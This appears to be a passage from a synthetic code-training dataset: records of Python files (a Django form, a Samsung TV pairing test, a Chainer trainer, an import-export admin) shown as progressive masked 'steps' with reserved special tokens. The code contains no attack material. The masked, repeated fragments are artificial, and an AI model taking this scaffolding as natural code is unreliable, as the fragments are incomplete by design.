3)\nkw = {'d':88, 'x':'#'}\nf2(*args, **kw)\n\n\n",
"step-ids": [
9,
14,
15,
19,
20
]
}
|
[
9,
14,
15,
19,
20
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for n in range(1, T + 1):
N = int(input())
arr = [list(map(int, list(input()))) for _ in range(N)]
a = N // 2
b = N // 2
result = 0
for i in range(N):
for j in range(a, b + 1):
result += arr[i][j]
print(result)
if i < N // 2:
a += -1
b += 1
else:
a += 1
b += -1
print('#{0} {1}'.format(n, result))
<|reserved_special_token_1|>
T = int(input())
for n in range(1, T + 1):
N = int(input())
arr = [list(map(int, list(input()))) for _ in range(N)]
a = N // 2
b = N // 2
result = 0
for i in range(N):
for j in range(a, b + 1):
result += arr[i][j]
print(result)
if i < N // 2:
a += -1
b += 1
else:
a += 1
b += -1
print('#{0} {1}'.format(n, result))
<|reserved_special_token_1|>
# import sys
# sys.stdin = open("농작물input.txt")
T = int(input())
for n in range(1, T+1):
N = int(input())
arr = [list(map(int, list(input()))) for _ in range(N)]
# print(arr)
a = N//2
b = N//2
result = 0
for i in range(N):
for j in range(a, b+1):
result += arr[i][j]
print(result)
if i < N//2:
a += -1
b += 1
else:
a += 1
b += -1
print("#{0} {1}".format(n, result))
|
flexible
|
{
"blob_id": "2236591b3a30f51442beb20c6c43cc9e6cd921d2",
"index": 7530,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor n in range(1, T + 1):\n N = int(input())\n arr = [list(map(int, list(input()))) for _ in range(N)]\n a = N // 2\n b = N // 2\n result = 0\n for i in range(N):\n for j in range(a, b + 1):\n result += arr[i][j]\n print(result)\n if i < N // 2:\n a += -1\n b += 1\n else:\n a += 1\n b += -1\n print('#{0} {1}'.format(n, result))\n",
"step-3": "T = int(input())\nfor n in range(1, T + 1):\n N = int(input())\n arr = [list(map(int, list(input()))) for _ in range(N)]\n a = N // 2\n b = N // 2\n result = 0\n for i in range(N):\n for j in range(a, b + 1):\n result += arr[i][j]\n print(result)\n if i < N // 2:\n a += -1\n b += 1\n else:\n a += 1\n b += -1\n print('#{0} {1}'.format(n, result))\n",
"step-4": "# import sys\n# sys.stdin = open(\"농작물input.txt\")\n\nT = int(input())\n\nfor n in range(1, T+1):\n N = int(input())\n arr = [list(map(int, list(input()))) for _ in range(N)]\n # print(arr)\n a = N//2\n b = N//2\n result = 0\n for i in range(N):\n for j in range(a, b+1):\n result += arr[i][j]\n print(result)\n if i < N//2:\n a += -1\n b += 1\n else:\n a += 1\n b += -1\n\n print(\"#{0} {1}\".format(n, result))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
class SignUpForm(UserCreationForm):
""" Sign up form fetching form the User creation form
and the email and password is necessary not the user """
class Meta:
model = User
fields = 'email', 'password1', 'password2'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ProfileForm(forms.ModelForm):
<|reserved_special_token_0|>
class Meta:
model = Profile
exclude = 'user',
class SignUpForm(UserCreationForm):
""" Sign up form fetching form the User creation form
and the email and password is necessary not the user """
class Meta:
model = User
fields = 'email', 'password1', 'password2'
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class ProfileForm(forms.ModelForm):
""" Form for the profile """
class Meta:
model = Profile
exclude = 'user',
class SignUpForm(UserCreationForm):
""" Sign up form fetching form the User creation form
and the email and password is necessary not the user """
class Meta:
model = User
fields = 'email', 'password1', 'password2'
<|reserved_special_token_1|>
from django import forms
from .models import User, Profile
from django.contrib.auth.forms import UserCreationForm
class ProfileForm(forms.ModelForm):
""" Form for the profile """
class Meta:
model = Profile
exclude = 'user',
class SignUpForm(UserCreationForm):
""" Sign up form fetching form the User creation form
and the email and password is necessary not the user """
class Meta:
model = User
fields = 'email', 'password1', 'password2'
<|reserved_special_token_1|>
from django import forms
from .models import User,Profile
from django.contrib.auth.forms import UserCreationForm
class ProfileForm(forms.ModelForm):
''' Form for the profile '''
class Meta:
model = Profile
exclude = ('user',) ## we will create the user with the signals
class SignUpForm(UserCreationForm):
''' Sign up form fetching form the User creation form
and the email and password is necessary not the user '''
class Meta:
model = User
fields = ('email','password1','password2')
|
flexible
|
{
"blob_id": "7c3569c43d27ba605c0dba420690e18d7f849965",
"index": 7372,
"step-1": "<mask token>\n\n\nclass SignUpForm(UserCreationForm):\n \"\"\" Sign up form fetching form the User creation form\n and the email and password is necessary not the user \"\"\"\n\n\n class Meta:\n model = User\n fields = 'email', 'password1', 'password2'\n",
"step-2": "<mask token>\n\n\nclass ProfileForm(forms.ModelForm):\n <mask token>\n\n\n class Meta:\n model = Profile\n exclude = 'user',\n\n\nclass SignUpForm(UserCreationForm):\n \"\"\" Sign up form fetching form the User creation form\n and the email and password is necessary not the user \"\"\"\n\n\n class Meta:\n model = User\n fields = 'email', 'password1', 'password2'\n",
"step-3": "<mask token>\n\n\nclass ProfileForm(forms.ModelForm):\n \"\"\" Form for the profile \"\"\"\n\n\n class Meta:\n model = Profile\n exclude = 'user',\n\n\nclass SignUpForm(UserCreationForm):\n \"\"\" Sign up form fetching form the User creation form\n and the email and password is necessary not the user \"\"\"\n\n\n class Meta:\n model = User\n fields = 'email', 'password1', 'password2'\n",
"step-4": "from django import forms\nfrom .models import User, Profile\nfrom django.contrib.auth.forms import UserCreationForm\n\n\nclass ProfileForm(forms.ModelForm):\n \"\"\" Form for the profile \"\"\"\n\n\n class Meta:\n model = Profile\n exclude = 'user',\n\n\nclass SignUpForm(UserCreationForm):\n \"\"\" Sign up form fetching form the User creation form\n and the email and password is necessary not the user \"\"\"\n\n\n class Meta:\n model = User\n fields = 'email', 'password1', 'password2'\n",
"step-5": "from django import forms\nfrom .models import User,Profile\nfrom django.contrib.auth.forms import UserCreationForm\n\n\nclass ProfileForm(forms.ModelForm):\n ''' Form for the profile '''\n class Meta:\n model = Profile\n exclude = ('user',) ## we will create the user with the signals\n\n\n\n\nclass SignUpForm(UserCreationForm):\n ''' Sign up form fetching form the User creation form\n and the email and password is necessary not the user '''\n class Meta:\n model = User\n fields = ('email','password1','password2')\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
"""SamsungTV Encrypted."""
import aiohttp
from aioresponses import aioresponses
import pytest
from yarl import URL
from samsungtvws.encrypted.authenticator import SamsungTVEncryptedWSAsyncAuthenticator
@pytest.mark.asyncio
async def test_authenticator(aioresponse: aioresponses) -> None:
with open("tests/fixtures/auth_pin_status.xml") as file:
aioresponse.get("http://1.2.3.4:8080/ws/apps/CloudPINPage", body=file.read())
with open("tests/fixtures/auth_pin_status.xml") as file:
aioresponse.post(
"http://1.2.3.4:8080/ws/apps/CloudPINPage",
body="http:///ws/apps/CloudPINPage/run",
)
with open("tests/fixtures/auth_empty.json") as file:
aioresponse.get(
"http://1.2.3.4:8080/ws/pairing?step=0&app_id=12345"
"&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184&type=1",
body=file.read(),
)
with open("tests/fixtures/auth_generator_client_hello.json") as file:
aioresponse.post(
"http://1.2.3.4:8080/ws/pairing?step=1&app_id=12345"
"&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184",
body=file.read(),
)
with open("tests/fixtures/auth_client_ack_msg.json") as file:
aioresponse.post(
"http://1.2.3.4:8080/ws/pairing?step=2&app_id=12345"
"&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184",
body=file.read(),
)
aioresponse.delete("http://1.2.3.4:8080/ws/apps/CloudPINPage/run", body="")
authenticator = SamsungTVEncryptedWSAsyncAuthenticator(
"1.2.3.4", web_session=aiohttp.ClientSession()
)
await authenticator.start_pairing()
token = await authenticator.try_pin("0997")
assert token == "545a596ab96b289c60896255e8690288"
session_id = await authenticator.get_session_id_and_close()
assert session_id == "1"
assert len(aioresponse.requests) == 6
print(aioresponse.requests)
request = aioresponse.requests[
(
"POST",
URL(
"http://1.2.3.4:8080/ws/pairing?app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184&step=1"
),
)
]
assert (
request[0].kwargs["data"]
== '{"auth_Data":{"auth_type":"SPC","GeneratorServerHello":'
'"010200000000000000008A000000063635343332317CAF9CBDC06B666D23EBC'
"A615E0666FEB2B807091BF507404DDD18329CD64A91E513DC704298CCE49C4C5"
"656C42141A696354A7145127BCD94CDD2B0D632D87E332437F86EBE5A50A1512"
"F3F54C71B791A88ECBAF562FBABE2731F27D851A764CA114DBE2C2C965DF151C"
'FC7401920FAA04636B356B97DBE1DA3A090004F81830000000000"}}'
)
request = aioresponse.requests[
(
"POST",
URL(
"http://1.2.3.4:8080/ws/pairing?app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184&step=2"
),
)
]
assert (
request[0].kwargs["data"]
== '{"auth_Data":{"auth_type":"SPC","request_id":"0","ServerAckMsg":'
'"01030000000000000000145F38EAFF0F6A6FF062CA652CD6CBAD9AF1EC62470000000000"}}'
)
|
normal
|
{
"blob_id": "e1448e62020f87e315d219be97d9af84607441df",
"index": 9104,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\n@pytest.mark.asyncio\nasync def test_authenticator(aioresponse: aioresponses) ->None:\n with open('tests/fixtures/auth_pin_status.xml') as file:\n aioresponse.get('http://1.2.3.4:8080/ws/apps/CloudPINPage', body=\n file.read())\n with open('tests/fixtures/auth_pin_status.xml') as file:\n aioresponse.post('http://1.2.3.4:8080/ws/apps/CloudPINPage', body=\n 'http:///ws/apps/CloudPINPage/run')\n with open('tests/fixtures/auth_empty.json') as file:\n aioresponse.get(\n 'http://1.2.3.4:8080/ws/pairing?step=0&app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184&type=1'\n , body=file.read())\n with open('tests/fixtures/auth_generator_client_hello.json') as file:\n aioresponse.post(\n 'http://1.2.3.4:8080/ws/pairing?step=1&app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184'\n , body=file.read())\n with open('tests/fixtures/auth_client_ack_msg.json') as file:\n aioresponse.post(\n 'http://1.2.3.4:8080/ws/pairing?step=2&app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184'\n , body=file.read())\n aioresponse.delete('http://1.2.3.4:8080/ws/apps/CloudPINPage/run', body='')\n authenticator = SamsungTVEncryptedWSAsyncAuthenticator('1.2.3.4',\n web_session=aiohttp.ClientSession())\n await authenticator.start_pairing()\n token = await authenticator.try_pin('0997')\n assert token == '545a596ab96b289c60896255e8690288'\n session_id = await authenticator.get_session_id_and_close()\n assert session_id == '1'\n assert len(aioresponse.requests) == 6\n print(aioresponse.requests)\n request = aioresponse.requests['POST', URL(\n 'http://1.2.3.4:8080/ws/pairing?app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184&step=1'\n )]\n assert request[0].kwargs['data'\n ] == '{\"auth_Data\":{\"auth_type\":\"SPC\",\"GeneratorServerHello\":\"010200000000000000008A000000063635343332317CAF9CBDC06B666D23EBCA615E0666FEB2B807091BF507404DDD18329CD64A91E513DC704298CCE49C4C5656C42141A696354A7145127BCD94CDD2B0D632D87E332437F86EBE5A50A1512F3F54C71B791A88ECBAF562FBABE2731F27D851A764CA114DBE2C2C965DF151CFC7401920FAA04636B356B97DBE1DA3A090004F81830000000000\"}}'\n request = aioresponse.requests['POST', URL(\n 'http://1.2.3.4:8080/ws/pairing?app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184&step=2'\n )]\n assert request[0].kwargs['data'\n ] == '{\"auth_Data\":{\"auth_type\":\"SPC\",\"request_id\":\"0\",\"ServerAckMsg\":\"01030000000000000000145F38EAFF0F6A6FF062CA652CD6CBAD9AF1EC62470000000000\"}}'\n",
"step-3": "<mask token>\nimport aiohttp\nfrom aioresponses import aioresponses\nimport pytest\nfrom yarl import URL\nfrom samsungtvws.encrypted.authenticator import SamsungTVEncryptedWSAsyncAuthenticator\n\n\n@pytest.mark.asyncio\nasync def test_authenticator(aioresponse: aioresponses) ->None:\n with open('tests/fixtures/auth_pin_status.xml') as file:\n aioresponse.get('http://1.2.3.4:8080/ws/apps/CloudPINPage', body=\n file.read())\n with open('tests/fixtures/auth_pin_status.xml') as file:\n aioresponse.post('http://1.2.3.4:8080/ws/apps/CloudPINPage', body=\n 'http:///ws/apps/CloudPINPage/run')\n with open('tests/fixtures/auth_empty.json') as file:\n aioresponse.get(\n 'http://1.2.3.4:8080/ws/pairing?step=0&app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184&type=1'\n , body=file.read())\n with open('tests/fixtures/auth_generator_client_hello.json') as file:\n aioresponse.post(\n 'http://1.2.3.4:8080/ws/pairing?step=1&app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184'\n , body=file.read())\n with open('tests/fixtures/auth_client_ack_msg.json') as file:\n aioresponse.post(\n 'http://1.2.3.4:8080/ws/pairing?step=2&app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184'\n , body=file.read())\n aioresponse.delete('http://1.2.3.4:8080/ws/apps/CloudPINPage/run', body='')\n authenticator = SamsungTVEncryptedWSAsyncAuthenticator('1.2.3.4',\n web_session=aiohttp.ClientSession())\n await authenticator.start_pairing()\n token = await authenticator.try_pin('0997')\n assert token == '545a596ab96b289c60896255e8690288'\n session_id = await authenticator.get_session_id_and_close()\n assert session_id == '1'\n assert len(aioresponse.requests) == 6\n print(aioresponse.requests)\n request = aioresponse.requests['POST', URL(\n 'http://1.2.3.4:8080/ws/pairing?app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184&step=1'\n )]\n assert request[0].kwargs['data'\n ] == '{\"auth_Data\":{\"auth_type\":\"SPC\",\"GeneratorServerHello\":\"010200000000000000008A000000063635343332317CAF9CBDC06B666D23EBCA615E0666FEB2B807091BF507404DDD18329CD64A91E513DC704298CCE49C4C5656C42141A696354A7145127BCD94CDD2B0D632D87E332437F86EBE5A50A1512F3F54C71B791A88ECBAF562FBABE2731F27D851A764CA114DBE2C2C965DF151CFC7401920FAA04636B356B97DBE1DA3A090004F81830000000000\"}}'\n request = aioresponse.requests['POST', URL(\n 'http://1.2.3.4:8080/ws/pairing?app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184&step=2'\n )]\n assert request[0].kwargs['data'\n ] == '{\"auth_Data\":{\"auth_type\":\"SPC\",\"request_id\":\"0\",\"ServerAckMsg\":\"01030000000000000000145F38EAFF0F6A6FF062CA652CD6CBAD9AF1EC62470000000000\"}}'\n",
"step-4": "\"\"\"SamsungTV Encrypted.\"\"\"\nimport aiohttp\nfrom aioresponses import aioresponses\nimport pytest\nfrom yarl import URL\n\nfrom samsungtvws.encrypted.authenticator import SamsungTVEncryptedWSAsyncAuthenticator\n\n\n@pytest.mark.asyncio\nasync def test_authenticator(aioresponse: aioresponses) -> None:\n with open(\"tests/fixtures/auth_pin_status.xml\") as file:\n aioresponse.get(\"http://1.2.3.4:8080/ws/apps/CloudPINPage\", body=file.read())\n with open(\"tests/fixtures/auth_pin_status.xml\") as file:\n aioresponse.post(\n \"http://1.2.3.4:8080/ws/apps/CloudPINPage\",\n body=\"http:///ws/apps/CloudPINPage/run\",\n )\n with open(\"tests/fixtures/auth_empty.json\") as file:\n aioresponse.get(\n \"http://1.2.3.4:8080/ws/pairing?step=0&app_id=12345\"\n \"&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184&type=1\",\n body=file.read(),\n )\n with open(\"tests/fixtures/auth_generator_client_hello.json\") as file:\n aioresponse.post(\n \"http://1.2.3.4:8080/ws/pairing?step=1&app_id=12345\"\n \"&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184\",\n body=file.read(),\n )\n with open(\"tests/fixtures/auth_client_ack_msg.json\") as file:\n aioresponse.post(\n \"http://1.2.3.4:8080/ws/pairing?step=2&app_id=12345\"\n \"&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184\",\n body=file.read(),\n )\n aioresponse.delete(\"http://1.2.3.4:8080/ws/apps/CloudPINPage/run\", body=\"\")\n\n authenticator = SamsungTVEncryptedWSAsyncAuthenticator(\n \"1.2.3.4\", web_session=aiohttp.ClientSession()\n )\n await authenticator.start_pairing()\n token = await authenticator.try_pin(\"0997\")\n assert token == \"545a596ab96b289c60896255e8690288\"\n\n session_id = await authenticator.get_session_id_and_close()\n assert session_id == \"1\"\n\n assert len(aioresponse.requests) == 6\n print(aioresponse.requests)\n\n request = aioresponse.requests[\n (\n \"POST\",\n URL(\n \"http://1.2.3.4:8080/ws/pairing?app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184&step=1\"\n ),\n )\n ]\n assert (\n request[0].kwargs[\"data\"]\n == '{\"auth_Data\":{\"auth_type\":\"SPC\",\"GeneratorServerHello\":'\n '\"010200000000000000008A000000063635343332317CAF9CBDC06B666D23EBC'\n \"A615E0666FEB2B807091BF507404DDD18329CD64A91E513DC704298CCE49C4C5\"\n \"656C42141A696354A7145127BCD94CDD2B0D632D87E332437F86EBE5A50A1512\"\n \"F3F54C71B791A88ECBAF562FBABE2731F27D851A764CA114DBE2C2C965DF151C\"\n 'FC7401920FAA04636B356B97DBE1DA3A090004F81830000000000\"}}'\n )\n request = aioresponse.requests[\n (\n \"POST\",\n URL(\n \"http://1.2.3.4:8080/ws/pairing?app_id=12345&device_id=7e509404-9d7c-46b4-8f6a-e2a9668ad184&step=2\"\n ),\n )\n ]\n assert (\n request[0].kwargs[\"data\"]\n == '{\"auth_Data\":{\"auth_type\":\"SPC\",\"request_id\":\"0\",\"ServerAckMsg\":'\n '\"01030000000000000000145F38EAFF0F6A6FF062CA652CD6CBAD9AF1EC62470000000000\"}}'\n )\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
from simulating_blobs_of_fluid.simulation import Simulation
from simulating_blobs_of_fluid.fluid_renderer import FluidRenderer
import arcade
def main():
simulation = Simulation(particle_count=50, dt=0.016, box_width=250)
FluidRenderer(simulation.box_width, 800, simulation)
arcade.run()
if __name__ == "__main__":
main()
|
normal
|
{
"blob_id": "83733e707a1be131335c4980cdf4beed365eb530",
"index": 6011,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n simulation = Simulation(particle_count=50, dt=0.016, box_width=250)\n FluidRenderer(simulation.box_width, 800, simulation)\n arcade.run()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n simulation = Simulation(particle_count=50, dt=0.016, box_width=250)\n FluidRenderer(simulation.box_width, 800, simulation)\n arcade.run()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "from simulating_blobs_of_fluid.simulation import Simulation\nfrom simulating_blobs_of_fluid.fluid_renderer import FluidRenderer\nimport arcade\n\n\ndef main():\n simulation = Simulation(particle_count=50, dt=0.016, box_width=250)\n FluidRenderer(simulation.box_width, 800, simulation)\n arcade.run()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "from simulating_blobs_of_fluid.simulation import Simulation\nfrom simulating_blobs_of_fluid.fluid_renderer import FluidRenderer\n\nimport arcade\n\n\ndef main():\n simulation = Simulation(particle_count=50, dt=0.016, box_width=250)\n FluidRenderer(simulation.box_width, 800, simulation)\n\n arcade.run()\n\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
class DataResource(resources.ModelResource):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
class Meta:
fields = 'groupname', 'system_name', 'I6000'
class DataAdmin(ImportExportMixin, admin.ModelAdmin):
list_display = ['groupname', 'system_name', 'I6000', 'xtjslx', 'bslx',
'ywbs', 'ywzrbs', 'yunxingzhuangtai', 'url', 'xtsxsj', 'xtxxsj',
'ip', 'xunijiqunip', 'date']
resources_class = DataResource
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DataResource(resources.ModelResource):
groupname = fields.Field(widget=widgets.ForeignKeyWidget(Addgroup, 'name'))
system_name = fields.Field(column_name='system_name', attribute=
'system_name', widget=widgets.ForeignKeyWidget(Addsystemname, 'name'))
I6000 = fields.Field(column_name='I6000', attribute='I6000')
class Meta:
fields = 'groupname', 'system_name', 'I6000'
class DataAdmin(ImportExportMixin, admin.ModelAdmin):
list_display = ['groupname', 'system_name', 'I6000', 'xtjslx', 'bslx',
'ywbs', 'ywzrbs', 'yunxingzhuangtai', 'url', 'xtsxsj', 'xtxxsj',
'ip', 'xunijiqunip', 'date']
resources_class = DataResource
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class DataResource(resources.ModelResource):
groupname = fields.Field(widget=widgets.ForeignKeyWidget(Addgroup, 'name'))
system_name = fields.Field(column_name='system_name', attribute=
'system_name', widget=widgets.ForeignKeyWidget(Addsystemname, 'name'))
I6000 = fields.Field(column_name='I6000', attribute='I6000')
class Meta:
fields = 'groupname', 'system_name', 'I6000'
class DataAdmin(ImportExportMixin, admin.ModelAdmin):
list_display = ['groupname', 'system_name', 'I6000', 'xtjslx', 'bslx',
'ywbs', 'ywzrbs', 'yunxingzhuangtai', 'url', 'xtsxsj', 'xtxxsj',
'ip', 'xunijiqunip', 'date']
resources_class = DataResource
admin.site.register(Data, DataAdmin)
<|reserved_special_token_1|>
from import_export.admin import ImportExportMixin
from django.contrib import admin
from import_export import resources, widgets, fields
from .models import Addgroup, Addsystemname, Zhuanzhebushi, Yewuzerenbumen, czyylx, Zhuanze, Data
from import_export import fields, resources
from import_export.widgets import ForeignKeyWidget
class DataResource(resources.ModelResource):
groupname = fields.Field(widget=widgets.ForeignKeyWidget(Addgroup, 'name'))
system_name = fields.Field(column_name='system_name', attribute=
'system_name', widget=widgets.ForeignKeyWidget(Addsystemname, 'name'))
I6000 = fields.Field(column_name='I6000', attribute='I6000')
class Meta:
fields = 'groupname', 'system_name', 'I6000'
class DataAdmin(ImportExportMixin, admin.ModelAdmin):
list_display = ['groupname', 'system_name', 'I6000', 'xtjslx', 'bslx',
'ywbs', 'ywzrbs', 'yunxingzhuangtai', 'url', 'xtsxsj', 'xtxxsj',
'ip', 'xunijiqunip', 'date']
resources_class = DataResource
admin.site.register(Data, DataAdmin)
<|reserved_special_token_1|>
from import_export.admin import ImportExportMixin
from django.contrib import admin
from import_export import resources, widgets, fields
from .models import Addgroup,Addsystemname,Zhuanzhebushi,Yewuzerenbumen,czyylx,Zhuanze,Data
from import_export import fields, resources
from import_export.widgets import ForeignKeyWidget
# Register your models here.
class DataResource(resources.ModelResource):
groupname = fields.Field( widget=widgets.ForeignKeyWidget(Addgroup, 'name'))
system_name = fields.Field(column_name='system_name', attribute='system_name', widget=widgets.ForeignKeyWidget(Addsystemname, 'name'))
I6000 = fields.Field(column_name='I6000', attribute='I6000')
class Meta:
fields = ('groupname','system_name','I6000')
class DataAdmin(ImportExportMixin,admin.ModelAdmin):
list_display = ['groupname','system_name','I6000','xtjslx','bslx','ywbs','ywzrbs','yunxingzhuangtai','url','xtsxsj','xtxxsj','ip','xunijiqunip','date']
resources_class = DataResource
admin.site.register(Data,DataAdmin)
|
flexible
|
{
"blob_id": "016b64a2eb4af3034d54272c878fb917506d330c",
"index": 648,
"step-1": "<mask token>\n\n\nclass DataResource(resources.ModelResource):\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n fields = 'groupname', 'system_name', 'I6000'\n\n\nclass DataAdmin(ImportExportMixin, admin.ModelAdmin):\n list_display = ['groupname', 'system_name', 'I6000', 'xtjslx', 'bslx',\n 'ywbs', 'ywzrbs', 'yunxingzhuangtai', 'url', 'xtsxsj', 'xtxxsj',\n 'ip', 'xunijiqunip', 'date']\n resources_class = DataResource\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass DataResource(resources.ModelResource):\n groupname = fields.Field(widget=widgets.ForeignKeyWidget(Addgroup, 'name'))\n system_name = fields.Field(column_name='system_name', attribute=\n 'system_name', widget=widgets.ForeignKeyWidget(Addsystemname, 'name'))\n I6000 = fields.Field(column_name='I6000', attribute='I6000')\n\n\n class Meta:\n fields = 'groupname', 'system_name', 'I6000'\n\n\nclass DataAdmin(ImportExportMixin, admin.ModelAdmin):\n list_display = ['groupname', 'system_name', 'I6000', 'xtjslx', 'bslx',\n 'ywbs', 'ywzrbs', 'yunxingzhuangtai', 'url', 'xtsxsj', 'xtxxsj',\n 'ip', 'xunijiqunip', 'date']\n resources_class = DataResource\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass DataResource(resources.ModelResource):\n groupname = fields.Field(widget=widgets.ForeignKeyWidget(Addgroup, 'name'))\n system_name = fields.Field(column_name='system_name', attribute=\n 'system_name', widget=widgets.ForeignKeyWidget(Addsystemname, 'name'))\n I6000 = fields.Field(column_name='I6000', attribute='I6000')\n\n\n class Meta:\n fields = 'groupname', 'system_name', 'I6000'\n\n\nclass DataAdmin(ImportExportMixin, admin.ModelAdmin):\n list_display = ['groupname', 'system_name', 'I6000', 'xtjslx', 'bslx',\n 'ywbs', 'ywzrbs', 'yunxingzhuangtai', 'url', 'xtsxsj', 'xtxxsj',\n 'ip', 'xunijiqunip', 'date']\n resources_class = DataResource\n\n\nadmin.site.register(Data, DataAdmin)\n",
"step-4": "from import_export.admin import ImportExportMixin\nfrom django.contrib import admin\nfrom import_export import resources, widgets, fields\nfrom .models import Addgroup, Addsystemname, Zhuanzhebushi, Yewuzerenbumen, czyylx, Zhuanze, Data\nfrom import_export import fields, resources\nfrom import_export.widgets import ForeignKeyWidget\n\n\nclass DataResource(resources.ModelResource):\n groupname = fields.Field(widget=widgets.ForeignKeyWidget(Addgroup, 'name'))\n system_name = fields.Field(column_name='system_name', attribute=\n 'system_name', widget=widgets.ForeignKeyWidget(Addsystemname, 'name'))\n I6000 = fields.Field(column_name='I6000', attribute='I6000')\n\n\n class Meta:\n fields = 'groupname', 'system_name', 'I6000'\n\n\nclass DataAdmin(ImportExportMixin, admin.ModelAdmin):\n list_display = ['groupname', 'system_name', 'I6000', 'xtjslx', 'bslx',\n 'ywbs', 'ywzrbs', 'yunxingzhuangtai', 'url', 'xtsxsj', 'xtxxsj',\n 'ip', 'xunijiqunip', 'date']\n resources_class = DataResource\n\n\nadmin.site.register(Data, DataAdmin)\n",
"step-5": "from import_export.admin import ImportExportMixin\nfrom django.contrib import admin\nfrom import_export import resources, widgets, fields\nfrom .models import Addgroup,Addsystemname,Zhuanzhebushi,Yewuzerenbumen,czyylx,Zhuanze,Data\nfrom import_export import fields, resources\nfrom import_export.widgets import ForeignKeyWidget\n# Register your models here.\n\nclass DataResource(resources.ModelResource):\n groupname = fields.Field( widget=widgets.ForeignKeyWidget(Addgroup, 'name'))\n system_name = fields.Field(column_name='system_name', attribute='system_name', widget=widgets.ForeignKeyWidget(Addsystemname, 'name'))\n I6000 = fields.Field(column_name='I6000', attribute='I6000')\n class Meta:\n fields = ('groupname','system_name','I6000')\n\nclass DataAdmin(ImportExportMixin,admin.ModelAdmin):\n list_display = ['groupname','system_name','I6000','xtjslx','bslx','ywbs','ywzrbs','yunxingzhuangtai','url','xtsxsj','xtxxsj','ip','xunijiqunip','date']\n resources_class = DataResource\n\n\nadmin.site.register(Data,DataAdmin)",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
# -*- coding: utf-8 -*-
import chainer.links as L
import chainer.functions as F
from chainer import optimizer, optimizers, training, iterators
from chainer.training import extensions
from chainer.datasets import tuple_dataset
class SoftMaxTrainer():
def __init__(self, net):
self.model = L.Classifier(net)
def set_train_data(self, train_x, train_t, valid_x, valid_t, n_batch):
train = tuple_dataset.TupleDataset(train_x, train_t)
test = tuple_dataset.TupleDataset(valid_x, valid_t)
self.train_iter = iterators.SerialIterator(train, n_batch)
self.test_iter = iterators.SerialIterator(test, n_batch, repeat=False, shuffle=False)
def set_trainer(self, out_dir, gpu, n_epoch, g_clip, opt_name, lr=None):
if opt_name == "Adam":
opt = getattr(optimizers, opt_name)()
else:
opt = getattr(optimizers, opt_name)(lr)
opt.setup(self.model)
opt.add_hook(optimizer.GradientClipping(g_clip))
updater = training.StandardUpdater(self.train_iter, opt, device=gpu)
self.trainer = training.Trainer(updater, (n_epoch, 'epoch'), out=out_dir)
self.trainer.extend(extensions.Evaluator(self.test_iter, self.model, device=gpu))
self.trainer.extend(extensions.dump_graph('main/loss'))
self.trainer.extend(extensions.snapshot(), trigger=(n_epoch, 'epoch'))
self.trainer.extend(extensions.LogReport())
self.trainer.extend(extensions.PlotReport(['main/loss', 'validation/main/loss'],
'epoch', file_name='loss.png'))
self.trainer.extend(extensions.PlotReport(['main/accuracy', 'validation/main/accuracy'],
'epoch', file_name='accuracy.png'))
self.trainer.extend(extensions.PrintReport(['epoch', 'main/loss', 'validation/main/loss',
'main/accuracy', 'validation/main/accuracy',
'elapsed_time']))
self.trainer.extend(extensions.ProgressBar())
def start(self):
self.trainer.run()
def predict(self, x):
pred = F.softmax(self.model.predictor(x, train=False))
return pred.data
|
normal
|
{
"blob_id": "474700968e563d34d6a0296ec62950e2e71fe1b0",
"index": 1671,
